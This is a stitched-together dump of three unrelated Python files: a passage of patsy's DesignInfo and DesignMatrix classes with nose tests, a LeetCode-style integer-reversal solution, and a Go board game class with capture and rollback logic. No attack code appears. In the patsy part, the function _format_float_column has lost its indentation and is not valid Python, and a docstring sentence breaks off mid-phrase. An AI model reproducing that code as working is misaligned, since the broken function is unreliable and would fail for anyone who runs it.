            self.term_slices = None
            if term_name_slices is None:
                # Make up one term per column
                term_names = column_names
                slices = [slice(i, i + 1) for i in xrange(len(column_names))]
                term_name_slices = zip(term_names, slices)
            self.term_name_slices = OrderedDict(term_name_slices)
        self.builder = builder
        # Guarantees:
        #   term_name_slices is never None
        #   The slices in term_name_slices are in order and exactly cover the
        #     whole range of columns.
        #   term_slices may be None
        #   If term_slices is not None, then its slices match the ones in
        #     term_name_slices.
        #   If there is any name overlap between terms and columns, they refer
        #     to the same columns.
        assert self.term_name_slices is not None
        if self.term_slices is not None:
            assert self.term_slices.values() == self.term_name_slices.values()
        # Validate that the slices tile the columns exactly: in order,
        # step 1, no gaps, no overlap.
        covered = 0
        for slice_ in self.term_name_slices.itervalues():
            start, stop, step = slice_.indices(len(column_names))
            if start != covered:
                raise ValueError, "bad term slices"
            if step != 1:
                raise ValueError, "bad term slices"
            covered = stop
        if covered != len(column_names):
            raise ValueError, "bad term indices"
        # A term name may coincide with a column name only if both refer to
        # exactly the same single column.
        for column_name, index in self.column_name_indexes.iteritems():
            if column_name in self.term_name_slices:
                slice_ = self.term_name_slices[column_name]
                if slice_ != slice(index, index + 1):
                    raise ValueError, "term/column name collision"
    __repr__ = repr_pretty_delegate
    def _repr_pretty_(self, p, cycle):
        # Pretty-printer hook used by repr_pretty_delegate (IPython-style).
        assert not cycle
        if self.term_slices is None:
            kwargs = [("term_name_slices", self.term_name_slices)]
        else:
            kwargs = [("term_slices", self.term_slices)]
        if self.builder is not None:
            kwargs.append(("builder", self.builder))
        repr_pretty_impl(p, self, [self.column_names], kwargs)
    @property
    def column_names(self):
        "A list of the column names, in order."
        return self.column_name_indexes.keys()
    @property
    def terms(self):
        "A list of :class:`Terms`, in order, or else None."
        if self.term_slices is None:
            return None
        return self.term_slices.keys()
    @property
    def term_names(self):
        "A list of terms, in order."
        return self.term_name_slices.keys()
    def slice(self, columns_specifier):
        """Locate a subset of design matrix columns, specified symbolically.
        A patsy design matrix has two levels of structure: the individual
        columns (which are named), and the :ref:`terms <formulas>` in
        the formula that generated those columns. This is a one-to-many
        relationship: a single term may span several columns. This method
        provides a user-friendly API for locating those columns.
        (While we talk about columns here, this is probably most useful for
        indexing into other arrays that are derived from the design matrix,
        such as regression coefficients or covariance matrices.)
        The `columns_specifier` argument can take a number of forms:
        * A term name
        * A column name
        * A :class:`Term` object
        * An integer giving a raw index
        * A raw slice object
        In all cases, a Python :func:`slice` object is returned, which can be
        used directly for indexing.
        Example::
          y, X = dmatrices("y ~ a", demo_data("y", "a", nlevels=3))
          betas = np.linalg.lstsq(X, y)[0]
          a_betas = betas[X.design_info.slice("a")]
        (If you want to look up a single individual column by name, use
        ``design_info.column_name_indexes[name]``.)
        """
        if isinstance(columns_specifier, slice):
            return columns_specifier
        if np.issubsctype(type(columns_specifier), np.integer):
            return slice(columns_specifier, columns_specifier + 1)
        if (self.term_slices is not None
            and columns_specifier in self.term_slices):
            return self.term_slices[columns_specifier]
        if columns_specifier in self.term_name_slices:
            return self.term_name_slices[columns_specifier]
        if columns_specifier in self.column_name_indexes:
            idx = self.column_name_indexes[columns_specifier]
            return slice(idx, idx + 1)
        raise PatsyError("unknown column specified '%s'"
                         % (columns_specifier,))
    def linear_constraint(self, constraint_likes):
        """Construct a linear constraint in matrix form from a (possibly
        symbolic) description.
        Possible inputs:
        * A dictionary which is taken as a set of equality constraint. Keys
          can be either string column names, or integer column indexes.
        * A string giving a arithmetic expression referring to the matrix
          columns by name.
        * A list of such strings which are ANDed together.
        * A tuple (A, b) where A and b are array_likes, and the constraint is
          Ax = b. If necessary, these will be coerced to the proper
          dimensionality by appending dimensions with size 1.
        The string-based language has the standard arithmetic operators, / * +
        - and parentheses, plus "=" is used for equality and "," is used to
        AND together multiple constraint equations within a string. You can
        If no = appears in some expression, then that expression is assumed to
        be equal to zero. Division is always float-based, even if
        ``__future__.true_division`` isn't in effect.
        Returns a :class:`LinearConstraint` object.
        Examples::
          di = DesignInfo(["x1", "x2", "x3"])
          # Equivalent ways to write x1 == 0:
          di.linear_constraint({"x1": 0})  # by name
          di.linear_constraint({0: 0})  # by index
          di.linear_constraint("x1 = 0")  # string based
          di.linear_constraint("x1")  # can leave out "= 0"
          di.linear_constraint("2 * x1 = (x1 + 2 * x1) / 3")
          di.linear_constraint(([1, 0, 0], 0))  # constraint matrices
          # Equivalent ways to write x1 == 0 and x3 == 10
          di.linear_constraint({"x1": 0, "x3": 10})
          di.linear_constraint({0: 0, 2: 10})
          di.linear_constraint({0: 0, "x3": 10})
          di.linear_constraint("x1 = 0, x3 = 10")
          di.linear_constraint("x1, x3 = 10")
          di.linear_constraint(["x1", "x3 = 0"])  # list of strings
          di.linear_constraint("x1 = 0, x3 - 10 = x1")
          di.linear_constraint([[1, 0, 0], [0, 0, 1]], [0, 10])
          # You can also chain together equalities, just like Python:
          di.linear_constraint("x1 = x2 = 3")
        """
        return linear_constraint(constraint_likes, self.column_names)
    def describe(self):
        """Returns a human-readable string describing this design info.
        Example:
        .. ipython::
          In [1]: y, X = dmatrices("y ~ x1 + x2", demo_data("y", "x1", "x2"))
          In [2]: y.design_info.describe()
          Out[2]: 'y'
          In [3]: X.design_info.describe()
          Out[3]: '1 + x1 + x2'
        .. warning::
           There is no guarantee that the strings returned by this
           function can be parsed as formulas. They are best-effort descriptions
           intended for human users.
        """
        names = []
        for name in self.term_names:
            # "Intercept" is rendered as the conventional "1".
            if name == "Intercept":
                names.append("1")
            else:
                names.append(name)
        return " + ".join(names)
    @classmethod
    def from_array(cls, array_like, default_column_prefix="column"):
        """Find or construct a DesignInfo appropriate for a given array_like.
        If the input `array_like` already has a ``.design_info``
        attribute, then it will be returned. Otherwise, a new DesignInfo
        object will be constructed, using names either taken from the
        `array_like` (e.g., for a pandas DataFrame with named columns), or
        constructed using `default_column_prefix`.
        This is how :func:`dmatrix` (for example) creates a DesignInfo object
        if an arbitrary matrix is passed in.
        :arg array_like: An ndarray or pandas container.
        :arg default_column_prefix: If it's necessary to invent column names,
          then this will be used to construct them.
        :returns: a DesignInfo object
        """
        if hasattr(array_like, "design_info") and isinstance(array_like.design_info, cls):
            return array_like.design_info
        arr = atleast_2d_column_default(array_like, preserve_pandas=True)
        if arr.ndim > 2:
            raise ValueError, "design matrix can't have >2 dimensions"
        columns = getattr(arr, "columns", xrange(arr.shape[1]))
        # Use the container's column labels only when they are genuine
        # names (not a plain integer range); otherwise invent names.
        if (isinstance(columns, np.ndarray)
            and not np.issubdtype(columns.dtype, np.integer)):
            column_names = [str(obj) for obj in columns]
        else:
            column_names = ["%s%s" % (default_column_prefix, i)
                            for i in columns]
        return DesignInfo(column_names)
def test_DesignInfo():
    """Unit tests: DesignInfo construction, slicing, and input validation."""
    from nose.tools import assert_raises
    # Minimal stand-in for patsy's Term: only .name() is needed here.
    class _MockTerm(object):
        def __init__(self, name):
            self._name = name
        def name(self):
            return self._name
    t_a = _MockTerm("a")
    t_b = _MockTerm("b")
    di = DesignInfo(["a1", "a2", "a3", "b"],
                    [(t_a, slice(0, 3)), (t_b, slice(3, 4))],
                    builder="asdf")
    assert di.column_names == ["a1", "a2", "a3", "b"]
    assert di.term_names == ["a", "b"]
    assert di.terms == [t_a, t_b]
    assert di.column_name_indexes == {"a1": 0, "a2": 1, "a3": 2, "b": 3}
    assert di.term_name_slices == {"a": slice(0, 3), "b": slice(3, 4)}
    assert di.term_slices == {t_a: slice(0, 3), t_b: slice(3, 4)}
    assert di.describe() == "a + b"
    assert di.builder == "asdf"
    assert di.slice(1) == slice(1, 2)
    assert di.slice("a1") == slice(0, 1)
    assert di.slice("a2") == slice(1, 2)
    assert di.slice("a3") == slice(2, 3)
    assert di.slice("a") == slice(0, 3)
    assert di.slice(t_a) == slice(0, 3)
    assert di.slice("b") == slice(3, 4)
    assert di.slice(t_b) == slice(3, 4)
    assert di.slice(slice(2, 4)) == slice(2, 4)
    assert_raises(PatsyError, di.slice, "asdf")
    # smoke test
    repr(di)
    # One without term objects
    di = DesignInfo(["a1", "a2", "a3", "b"],
                    term_name_slices=[("a", slice(0, 3)),
                                      ("b", slice(3, 4))])
    assert di.column_names == ["a1", "a2", "a3", "b"]
    assert di.term_names == ["a", "b"]
    assert di.terms is None
    assert di.column_name_indexes == {"a1": 0, "a2": 1, "a3": 2, "b": 3}
    assert di.term_name_slices == {"a": slice(0, 3), "b": slice(3, 4)}
    assert di.term_slices is None
    assert di.describe() == "a + b"
    assert di.slice(1) == slice(1, 2)
    assert di.slice("a") == slice(0, 3)
    assert di.slice("a1") == slice(0, 1)
    assert di.slice("a2") == slice(1, 2)
    assert di.slice("a3") == slice(2, 3)
    assert di.slice("b") == slice(3, 4)
    # smoke test
    repr(di)
    # One without term objects *or* names
    di = DesignInfo(["a1", "a2", "a3", "b"])
    assert di.column_names == ["a1", "a2", "a3", "b"]
    assert di.term_names == ["a1", "a2", "a3", "b"]
    assert di.terms is None
    assert di.column_name_indexes == {"a1": 0, "a2": 1, "a3": 2, "b": 3}
    assert di.term_name_slices == {"a1": slice(0, 1),
                                   "a2": slice(1, 2),
                                   "a3": slice(2, 3),
                                   "b": slice(3, 4)}
    assert di.term_slices is None
    assert di.describe() == "a1 + a2 + a3 + b"
    assert di.slice(1) == slice(1, 2)
    assert di.slice("a1") == slice(0, 1)
    assert di.slice("a2") == slice(1, 2)
    assert di.slice("a3") == slice(2, 3)
    assert di.slice("b") == slice(3, 4)
    # Check intercept handling in describe()
    assert DesignInfo(["Intercept", "a", "b"]).describe() == "1 + a + b"
    # Can't specify both term_slices and term_name_slices
    assert_raises(ValueError,
                  DesignInfo,
                  ["a1", "a2"],
                  term_slices=[(t_a, slice(0, 2))],
                  term_name_slices=[("a", slice(0, 2))])
    # out-of-order slices are bad
    assert_raises(ValueError, DesignInfo, ["a1", "a2", "a3", "a4"],
                  term_slices=[(t_a, slice(3, 4)), (t_b, slice(0, 3))])
    # gaps in slices are bad
    assert_raises(ValueError, DesignInfo, ["a1", "a2", "a3", "a4"],
                  term_slices=[(t_a, slice(0, 2)), (t_b, slice(3, 4))])
    assert_raises(ValueError, DesignInfo, ["a1", "a2", "a3", "a4"],
                  term_slices=[(t_a, slice(1, 3)), (t_b, slice(3, 4))])
    assert_raises(ValueError, DesignInfo, ["a1", "a2", "a3", "a4"],
                  term_slices=[(t_a, slice(0, 2)), (t_b, slice(2, 3))])
    # overlapping slices ditto
    assert_raises(ValueError, DesignInfo, ["a1", "a2", "a3", "a4"],
                  term_slices=[(t_a, slice(0, 3)), (t_b, slice(2, 4))])
    # no step arguments
    assert_raises(ValueError, DesignInfo, ["a1", "a2", "a3", "a4"],
                  term_slices=[(t_a, slice(0, 4, 2))])
    # no term names that mismatch column names
    assert_raises(ValueError, DesignInfo, ["a1", "a2", "a3", "a4"],
                  term_name_slices=[("a1", slice(0, 3)), ("b", slice(3, 4))])
def test_DesignInfo_from_array():
    """Unit tests: DesignInfo.from_array name inference and pass-through."""
    di = DesignInfo.from_array([1, 2, 3])
    assert di.column_names == ["column0"]
    di2 = DesignInfo.from_array([[1, 2], [2, 3], [3, 4]])
    assert di2.column_names == ["column0", "column1"]
    di3 = DesignInfo.from_array([1, 2, 3], default_column_prefix="x")
    assert di3.column_names == ["x0"]
    di4 = DesignInfo.from_array([[1, 2], [2, 3], [3, 4]],
                                default_column_prefix="x")
    assert di4.column_names == ["x0", "x1"]
    m = DesignMatrix([1, 2, 3], di3)
    assert DesignInfo.from_array(m) is di3
    # But weird objects are ignored
    m.design_info = "asdf"
    di_weird = DesignInfo.from_array(m)
    assert di_weird.column_names == ["column0"]
    # pandas-specific behaviour is only tested when pandas is installed.
    from patsy.util import have_pandas
    if have_pandas:
        import pandas
        # with named columns
        di5 = DesignInfo.from_array(pandas.DataFrame([[1, 2]],
                                                     columns=["a", "b"]))
        assert di5.column_names == ["a", "b"]
        # with irregularly numbered columns
        di6 = DesignInfo.from_array(pandas.DataFrame([[1, 2]],
                                                     columns=[0, 10]))
        assert di6.column_names == ["column0", "column10"]
        # with .design_info attr
        df = pandas.DataFrame([[1, 2]])
        df.design_info = di6
        assert DesignInfo.from_array(df) is di6
def test_lincon():
    """Unit test: DesignInfo.linear_constraint builds the expected matrices."""
    di = DesignInfo(["a1", "a2", "a3", "b"],
                    term_name_slices=[("a", slice(0, 3)),
                                      ("b", slice(3, 4))])
    con = di.linear_constraint(["2 * a1 = b + 1", "a3"])
    assert con.variable_names == ["a1", "a2", "a3", "b"]
    assert np.all(con.coefs == [[2, 0, 0, -1], [0, 0, 1, 0]])
    assert np.all(con.constants == [[1], [0]])
# Idea: format with a reasonable amount of precision, then if that turns out
# to be higher than necessary, remove as many zeros as we can. But only do
# this while we can do it to *all* the ordinarily-formatted numbers, to keep
# decimal points aligned.
def _format_float_column(precision, col):
format_str = "%." + str(precision) + "f"
assert col.ndim == 1
# We don't want to look at numbers like "1e-5" or "nan" when stripping.
simple_float_chars = set("+-0123456789.")
col_strs = np.array([format_str % (x,) for x in col], dtype=object)
# Really every item should have a decimal, but just in case, we don't want
# to strip zeros off the end of "10" or something like that.
mask = np.array([simple_float_chars.issuperset(col_str) and "." in col_str
for col_str in col_strs])
mask_idxes = np.nonzero(mask)[0]
strip_char = "0"
if np.any(mask):
while True:
if np.all([s.endswith(strip_char) for s in col_strs[mask]]):
for idx in mask_idxes:
col_strs[idx] = col_strs[idx][:-1]
else:
if strip_char == "0":
strip_char = "."
else:
break
return col_strs
def test__format_float_column():
    """Unit tests: column formatting, zero-stripping, and NaN handling.
    (Python 2 file: note the print statement in the helper below.)"""
    def t(precision, numbers, expected):
        got = _format_float_column(precision, np.asarray(numbers))
        print got, expected
        assert np.array_equal(got, expected)
    # This acts weird on old python versions (e.g. it can be "-nan"), so don't
    # hardcode it:
    nan_string = "%.3f" % (np.nan,)
    t(3, [1, 2.1234, 2.1239, np.nan], ["1.000", "2.123", "2.124", nan_string])
    t(3, [1, 2, 3, np.nan], ["1", "2", "3", nan_string])
    t(3, [1.0001, 2, 3, np.nan], ["1", "2", "3", nan_string])
    t(4, [1.0001, 2, 3, np.nan], ["1.0001", "2.0000", "3.0000", nan_string])
# http://docs.scipy.org/doc/numpy/user/basics.subclassing.html#slightly-more-realistic-example-attribute-added-to-existing-array
class DesignMatrix(np.ndarray):
    """A simple numpy array subclass that carries design matrix metadata.

    .. attribute:: design_info

       A :class:`DesignInfo` object containing metadata about this design
       matrix.

    This class also defines a fancy __repr__ method with labeled
    columns. Otherwise it is identical to a regular numpy ndarray.

    .. warning::

       You should never check for this class using
       :func:`isinstance`. Limitations of the numpy API mean that it is
       impossible to prevent the creation of numpy arrays that have type
       DesignMatrix, but that are not actually design matrices (and such
       objects will behave like regular ndarrays in every way). Instead, check
       for the presence of a ``.design_info`` attribute -- this will be
       present only on "real" DesignMatrix objects.
    """
    def __new__(cls, input_array, design_info=None,
                default_column_prefix="column"):
        """Create a DesignMatrix, or cast an existing matrix to a DesignMatrix.

        A call like::

          DesignMatrix(my_array)

        will convert an arbitrary array_like object into a DesignMatrix.

        The return from this function is guaranteed to be a two-dimensional
        ndarray with a real-valued floating point dtype, and a
        ``.design_info`` attribute which matches its shape. If the
        `design_info` argument is not given, then one is created via
        :meth:`DesignInfo.from_array` using the given
        `default_column_prefix`.

        Depending on the input array, it is possible this will pass through
        its input unchanged, or create a view.
        """
        # Pass through existing DesignMatrixes. The design_info check is
        # necessary because numpy is sort of annoying and cannot be stopped
        # from turning non-design-matrix arrays into DesignMatrix
        # instances. (E.g., my_dm.diagonal() will return a DesignMatrix
        # object, but one without a design_info attribute.)
        if (isinstance(input_array, DesignMatrix)
            and hasattr(input_array, "design_info")):
            return input_array
        # Force at least 2-d (1-d input becomes a single column), as a view
        # of this class.
        self = atleast_2d_column_default(input_array).view(cls)
        # Upcast integer to floating point
        if np.issubdtype(self.dtype, np.integer):
            self = np.asarray(self, dtype=float).view(cls)
        if self.ndim > 2:
            raise ValueError, "DesignMatrix must be 2d"
        assert self.ndim == 2
        if design_info is None:
            design_info = DesignInfo.from_array(self, default_column_prefix)
        # The metadata must agree with the data: one name per column.
        if len(design_info.column_names) != self.shape[1]:
            raise ValueError("wrong number of column names for design matrix "
                             "(got %s, wanted %s)"
                             % (len(design_info.column_names), self.shape[1]))
        self.design_info = design_info
        # Complex, object, string etc. dtypes are rejected outright.
        if not np.issubdtype(self.dtype, np.floating):
            raise ValueError, "design matrix must be real-valued floating point"
        return self

    # Delegates repr() to _repr_pretty_ below.
    __repr__ = repr_pretty_delegate
    def _repr_pretty_(self, p, cycle):
        """IPython pretty-printer: tabular output with labeled columns."""
        if not hasattr(self, "design_info"):
            # Not a real DesignMatrix
            p.pretty(np.asarray(self))
            return
        assert not cycle

        # XX: could try calculating width of the current terminal window:
        #   http://stackoverflow.com/questions/566746/how-to-get-console-window-width-in-python
        # sadly it looks like ipython does not actually pass this information
        # in, even if we use _repr_pretty_ -- the pretty-printer object has a
        # fixed width it always uses. (As of IPython 0.12.)
        MAX_TOTAL_WIDTH = 78
        SEP = 2
        INDENT = 2
        MAX_ROWS = 30
        PRECISION = 5

        names = self.design_info.column_names
        column_name_widths = [len(name) for name in names]
        min_total_width = (INDENT + SEP * (self.shape[1] - 1)
                           + np.sum(column_name_widths))
        if min_total_width <= MAX_TOTAL_WIDTH:
            # Headers fit; try formatting (at most MAX_ROWS of) the numbers
            # and re-check the total width with the numeric columns included.
            printable_part = np.asarray(self)[:MAX_ROWS, :]
            formatted_cols = [_format_float_column(PRECISION,
                                                   printable_part[:, i])
                              for i in xrange(self.shape[1])]
            column_num_widths = [max([len(s) for s in col])
                                 for col in formatted_cols]
            column_widths = [max(name_width, num_width)
                             for (name_width, num_width)
                             in zip(column_name_widths, column_num_widths)]
            total_width = (INDENT + SEP * (self.shape[1] - 1)
                           + np.sum(column_widths))
            print_numbers = (total_width < MAX_TOTAL_WIDTH)
        else:
            print_numbers = False

        p.begin_group(INDENT, "DesignMatrix with shape %s" % (self.shape,))
        p.breakable("\n" + " " * p.indentation)
        if print_numbers:
            # We can fit the numbers on the screen
            sep = " " * SEP
            # list() is for Py3 compatibility
            for row in [names] + list(zip(*formatted_cols)):
                cells = [cell.rjust(width)
                         for (width, cell) in zip(column_widths, row)]
                p.text(sep.join(cells))
                p.text("\n" + " " * p.indentation)
            if MAX_ROWS < self.shape[0]:
                p.text("[%s rows omitted]" % (self.shape[0] - MAX_ROWS,))
                p.text("\n" + " " * p.indentation)
        else:
            # Too wide for a table: fall back to listing column names only.
            p.begin_group(2, "Columns:")
            p.breakable("\n" + " " * p.indentation)
            p.pretty(names)
            p.end_group(2, "")
            p.breakable("\n" + " " * p.indentation)
            p.begin_group(2, "Terms:")
            p.breakable("\n" + " " * p.indentation)
            for term_name, span in self.design_info.term_name_slices.iteritems():
                if span.start != 0:
                    p.breakable(", ")
                p.pretty(term_name)
                if span.stop - span.start == 1:
                    coltext = "column %s" % (span.start,)
                else:
                    coltext = "columns %s:%s" % (span.start, span.stop)
                p.text(" (%s)" % (coltext,))
            p.end_group(2, "")

        if not print_numbers or self.shape[0] > MAX_ROWS:
            # some data was not shown
            p.breakable("\n" + " " * p.indentation)
            p.text("(to view full data, use np.asarray(this_obj))")

        p.end_group(INDENT, "")

    # No __array_finalize__ method, because we don't want slices of this
    # object to keep the design_info (they may have different columns!), or
    # anything fancy like that.
def test_design_matrix():
    """Exercise DesignMatrix construction, validation, and repr smoke tests."""
    from nose.tools import assert_raises
    di = DesignInfo(["a1", "a2", "a3", "b"],
                    term_name_slices=[("a", slice(0, 3)),
                                      ("b", slice(3, 4))])
    mm = DesignMatrix([[12, 14, 16, 18]], di)
    assert mm.design_info.column_names == ["a1", "a2", "a3", "b"]

    # design_info with the wrong number of columns is rejected.
    bad_di = DesignInfo(["a1"])
    assert_raises(ValueError, DesignMatrix, [[12, 14, 16, 18]], bad_di)

    # Without design_info, default column names are generated from the prefix.
    mm2 = DesignMatrix([[12, 14, 16, 18]])
    assert mm2.design_info.column_names == ["column0", "column1", "column2",
                                            "column3"]

    # 1-d input is promoted to a single column.
    mm3 = DesignMatrix([12, 14, 16, 18])
    assert mm3.shape == (4, 1)

    # DesignMatrix always has exactly 2 dimensions
    assert_raises(ValueError, DesignMatrix, [[[1]]])

    # DesignMatrix constructor passes through existing DesignMatrixes
    mm4 = DesignMatrix(mm)
    assert mm4 is mm
    # But not if they are really slices:
    mm5 = DesignMatrix(mm.diagonal())
    assert mm5 is not mm

    mm6 = DesignMatrix([[12, 14, 16, 18]], default_column_prefix="x")
    assert mm6.design_info.column_names == ["x0", "x1", "x2", "x3"]

    # Only real-valued matrices can be DesignMatrixs
    assert_raises(ValueError, DesignMatrix, [1, 2, 3j])
    assert_raises(ValueError, DesignMatrix, ["a", "b", "c"])
    assert_raises(ValueError, DesignMatrix, [1, 2, object()])

    # Just smoke tests
    repr(mm)
    repr(DesignMatrix(np.arange(100)))
    repr(DesignMatrix(np.arange(100) * 2.0))
    repr(mm[1:, :])
    repr(DesignMatrix(np.arange(100).reshape((1, 100))))
    repr(DesignMatrix([np.nan, np.inf]))
    repr(DesignMatrix([np.nan, 0, 1e20, 20.5]))
|
class Solution(object):
    def reverse(self, x):
        """
        Reverse the decimal digits of x, returning 0 on signed 32-bit overflow.

        :type x: int
        :rtype: int
        """
        int_32_max = 2147483647
        int_32_min = -int_32_max - 1
        # Work on the magnitude; re-apply the sign at the end.
        positive = 1 if x >= 0 else -1
        x *= positive
        result = 0
        # BUG fix: `x is not 0` compared identity, not value (works only by
        # accident of CPython small-int caching); use a value comparison.
        while x != 0:
            digit = x % 10
            if result != 0:
                # Before appending `digit`, check that result*10 + digit stays
                # inside 32-bit range for both the positive and negative case.
                # Floor division `//` keeps the original Python-2 `/` integer
                # semantics while also being correct under Python 3.
                if int_32_max // result < 10 or int_32_max - result * 10 < digit \
                        or int_32_min // -result < 10 or int_32_min + result * 10 > -digit:
                    return 0
            result = result * 10 + digit
            x //= 10
        return result * positive
import unittest
class TestSolution(unittest.TestCase):
    def test_solution(self):
        """Check digit reversal of a value whose reverse is exactly -INT32_MAX."""
        # BUG fix: the old body only `print`ed the result (Python-2-only
        # syntax, and no assertion); pin the expected value instead.
        # -7463847412 reversed is -2147483647, which is still representable.
        self.assertEqual(Solution().reverse(-7463847412), -2147483647)
|
from functools import reduce
from copy import deepcopy
def neighbours(piece, board, toS = '.'):
    """Return the set of orthogonal neighbours of `piece` whose board value
    equals `toS` (default '.', i.e. the empty points / liberties).

    `piece` is a (row, col) tuple; `board` is indexable as board[row][col].
    """
    liberties = set()
    for i in (1, 0), (0, 1), (-1, 0), (0, -1):
        move = (i[0] + piece[0], i[1] + piece[1])
        try:
            # min(move) > -1 rejects negative indices (which would silently
            # wrap around to the other edge of the board).
            if min(move) > -1 and board[move[0]][move[1]] == toS:
                liberties.add(move)
        # BUG fix: a bare `except:` swallowed every error (even KeyboardInterrupt);
        # only out-of-range moves past the bottom/right edge should be skipped.
        except IndexError:
            pass
    return liberties
class cluster:
    """A connected group of same-coloured stones together with its liberties."""
    def __init__(self, colour):
        self.colour = colour
        self.pieces = []       # (row, col) tuples belonging to this group
        self.liberty = set()   # adjacent empty points

    def add(self, piece, board):
        """Add `piece` to the cluster; return the list of liberties gained."""
        # PERF fix: a shallow set() copy replaces deepcopy -- liberties are
        # immutable (row, col) tuples, so deep-copying them was pure overhead.
        r = set(self.liberty)
        self.liberty = self.liberty.union(neighbours(piece, board))
        self.liberty.discard(piece)
        self.pieces.append(piece)
        return list(self.liberty - r)

    def __add__(self, other):
        """Merge with `other` into a new cluster (note: also mutates self)."""
        self.liberty = self.liberty.union(other.liberty)
        self.pieces += other.pieces
        T = cluster(self.colour)
        T.liberty = self.liberty
        T.pieces = self.pieces
        return T

    def check_op(self, piece):
        """Remove `piece` from the liberties if present; return removals as a list."""
        discarded = []
        if piece in self.liberty:
            self.liberty.discard(piece)
            discarded.append(piece)
        return discarded

    def check_ad(self, piece):
        """True when `piece` is currently one of this cluster's liberties."""
        return piece in self.liberty

    def __eq__(self, other):
        # Clusters compare by their piece lists (used via list.index/remove).
        return self.pieces == other.pieces
class Go:
    """A Go (baduk) board: tracks stones, clusters, liberties, captures and a
    move history that supports rollback (also used to reject suicide/ko moves).
    """
    def __init__(self, h , w = None):
        # Square board when only one dimension is given; max 26x26 so every
        # column fits one letter of the (I-less) alphabet.
        w = h if not w else w
        if w > 26 or h > 26: raise ValueError("You're not allowed to play with that big board")
        self.w = w
        self.h = h
        self.board = [['.' for i in range(w)] for i in range(h)]
        self.player = "x"                               # black ('x') moves first
        self.alphabet = "ABCDEFGHJKLMNOPQRSTUVWXYZ"     # note: no letter 'I'
        self.o_clusters = []                            # white stone groups
        self.x_clusters = []                            # black stone groups
        self.moves = []                                 # per-move undo records
        self.handiF = 0                                 # handicap already placed?
    def move(self, *sequence):
        """Play each move (e.g. "3B") in turn, updating clusters/captures.

        Builds a MOVE undo-record as it goes; an illegal result (suicide, or a
        board repetition / ko) triggers rollback(1, 1) and raises ValueError.
        """
        # print(sequence)
        for move in sequence:
            rollB = 0
            MOVE = {}
            # Convert "<row number><column letter>" to (row, col) indices.
            a, b = self.h - int(move[:-1]), self.alphabet.index(move[-1])
            if self.board[a][b] != '.':
                raise ValueError()
            MOVE = {'move_loc': (a, b), 'color': self.player}
            # Snapshot the pre-move board for rollback / repetition checks.
            MOVE['board'] = '\n'.join([''.join(i) for i in self.board])
            self.board[a][b] = self.player
            MOVE['reductions'] = []
            # The new stone removes itself from every opposing cluster's
            # liberties; record each reduction for rollback.
            opposite = self.x_clusters if self.player == 'o' else self.o_clusters
            for i in range(len(opposite)):
                k = opposite[i].check_op((a, b))
                if k:
                    MOVE['reductions'].append((opposite[i], k))
            # Opposing clusters left with no liberties are captured.
            to_be_deleted = []; MOVE['deletions'] = []
            deleted_piece = []
            for i in range(len(opposite)):
                if len(opposite[i].liberty) == 0:
                    to_be_deleted.append(i)
                    MOVE['deletions'].append(opposite[i])
                    for j in opposite[i].pieces:
                        # NOTE(review): "'x' if self.player == 'x' else 'o'" is
                        # always just self.player -- confirm intent.
                        if neighbours(j, self.board, 'x' if self.player == 'x' else 'o'):
                            deleted_piece += [(i, j) for i in neighbours(j, self.board, 'x' if self.player == 'x' else 'o')]
                        self.board[j[0]][j[1]] = '.'
            for i in to_be_deleted[::-1]:
                del opposite[i]
            # Captured points become fresh liberties of adjacent own clusters,
            # and the new stone is merged into any cluster it touches.
            player = self.x_clusters if self.player == "x" else self.o_clusters
            flag = 0; MOVE['lib_change'] = []
            possible = []
            for i in range(len(player)):
                for ll in deleted_piece:
                    if ll[0] in player[i].pieces:
                        player[i].liberty.add(ll[1])
                if player[i].check_ad((a, b)):
                    flag = 1
                    possible.append(i)
                    dis = player[i].add((a, b), self.board)
                    MOVE['lib_change'].append((player[i], (('-', (a, b)), ) + tuple([('+', k) for k in dis])))
                    # if len(player[i].liberty) == 0:
                    #     rollB = 1
            MOVE['cluster'] = None
            if flag == 0:
                # Isolated stone: start a new cluster; no liberties => suicide.
                new_cluster = cluster(self.player)
                new_cluster.add((a, b), self.board)
                if len(new_cluster.liberty) == 0:
                    rollB = 1
                MOVE['cluster'] = new_cluster
                player.append(new_cluster)
            MOVE['merges'] = []
            if len(possible) > 1:
                # The stone connected several own clusters: merge them all.
                initial = [player[i] for i in possible]
                final = reduce(lambda a, b: a + b, initial)
                player[possible[0]] = final
                MOVE['merges'] = [initial, final]
                for f in possible[1:][::-1]:
                    del player[f]
            #protection
            if self.player == 'x':
                self.x_clusters = player
                self.o_clusters = opposite
            else:
                self.o_clusters = player
                self.x_clusters = opposite
            print(rollB)
            if move:
                print("The game and move was", move)
            print("________________________v_____________________")
            print(" " + " ".join("ABCDEFGHJKLMNOPQRSTUVWXYZ"[:self.w]))
            print("\n".join([str(self.h - j).zfill(2) + " " + ' '.join(i) for j, i in enumerate(self.board)]))
            print("\n\n")
            print("________________________^______________________")
            # Ko-like rule: recreating the previous position forces rollback.
            if len(self.moves) > 2 and 'board' in self.moves[-1] and self.moves[-1]['board'] == '\n'.join([''.join(i) for i in self.board]):
                rollB = 1
            self.moves.append(MOVE)
            if rollB:
                self.rollback(1, 1)
                raise ValueError()
            self.player = 'x' if self.player == 'o' else 'o'
        return self.board
    def get_position(self, st):
        """Return the board character at position string `st` (e.g. "3B")."""
        l = self.alphabet.index(st[-1])
        # NOTE(review): uses self.w here while move() uses self.h for the row
        # conversion -- only equivalent on square boards; confirm.
        n = self.w - int(st[:-1])
        return self.board[n][l]
    def handicap_stones(self, n):
        """Place up to n black handicap stones (9/13/19 boards, before any move)."""
        print("Yes handicapping",n)
        handi = {9: [(2, 6), (6, 2), (6, 6), (2, 2), (4, 4)],
                 13: [(3, 9), (9, 3), (9, 9), (3, 3), (6, 6), (6, 3), (6, 9), (3, 6), (9, 6)],
                 19: [(3, 15), (15, 3), (15, 15), (3, 3),(9, 9), (9, 3), (9, 15), (3, 9), (15, 9)]
                 }
        # NOTE(review): "self.h == self.h" is always True -- this was probably
        # meant to be self.w == self.h (square-board check); confirm.
        if self.h == self.h and self.h not in handi or n > len(handi[self.h]) or self.handiF == 1 or self.moves:
            raise ValueError()
        for pos in handi[self.h][:n]:
            self.board[pos[0]][pos[1]] = 'x'
        self.last = 'o'
        self.handiF = 1
    @property
    def turn(self):
        # Human-readable name of the player to move.
        return "black" if self.player == 'x' else "white"
    def pass_turn(self):
        """Record a pass (an empty MOVE dict) and hand the turn over."""
        print("turn was passed")
        self.moves.append({})
        self.player = "x" if self.player == "o" else "o"
    def reset(self):
        """Clear the board and history back to a fresh game."""
        print("Resetted")
        self.board = [['.']*self.w for i in range(self.h)]
        self.last = None
        self.moves = []
